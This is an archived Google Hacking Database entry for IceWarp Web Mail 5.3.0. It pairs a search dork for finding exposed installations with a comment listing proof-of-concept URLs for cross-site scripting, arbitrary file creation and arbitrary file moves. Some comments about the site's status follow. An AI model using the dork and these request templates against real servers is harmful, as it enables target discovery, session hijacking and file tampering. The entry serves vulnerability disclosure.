GHDB
GHDB
|
Google Search: “IceWarp Web Mail 5.3.0″ “Powered by IceWarp”
GIGO rates this entry 6 out of 10. Submitted: 2005-02-07 00:00:00 Added by: GIGO Hits: 5172 Score: 6 IceWarp Web Mail 5.3.0Multiple cross-site scripting and HTML injection vulnerabilities.http://www.securityfocus.com/bid/12396/ Comments: 2005-02-15 15:29:57 (Anonymous): Here’s some further information about the vulnerabilities: No exploits are required to leverage these issues. The following proof of concepts have been provided: To carry out cross-site scripting attacks: http://www.example.com:32000/mail/login.html?username=[xss_here] http://www.example.com/mail/accountsettings_add.html?id=[]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[xss_here] To create a file with arbitrary contents on an affected computer: http://www.example.com:32000/mail/accountsettings_add.html?id=[sessionid]&Save_x=1&account[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accontid=[arbitary_text] To move an arbitrary file to an attacker’s folder: http://localhost:32000/importaction.html?id=[sessionid]&importfile=[arbitrary_path]&action=upload&Import=1&importfile_size=1000000 |
Does GHDB still updates for now?
The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.
Hi Johnny,been a while since I’ve came last. Aren’t you gonna update this website anymore???
The GHDB is not updated and lives with the exploitdb: http://http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!
Is any offline view-able resources is available of this product ?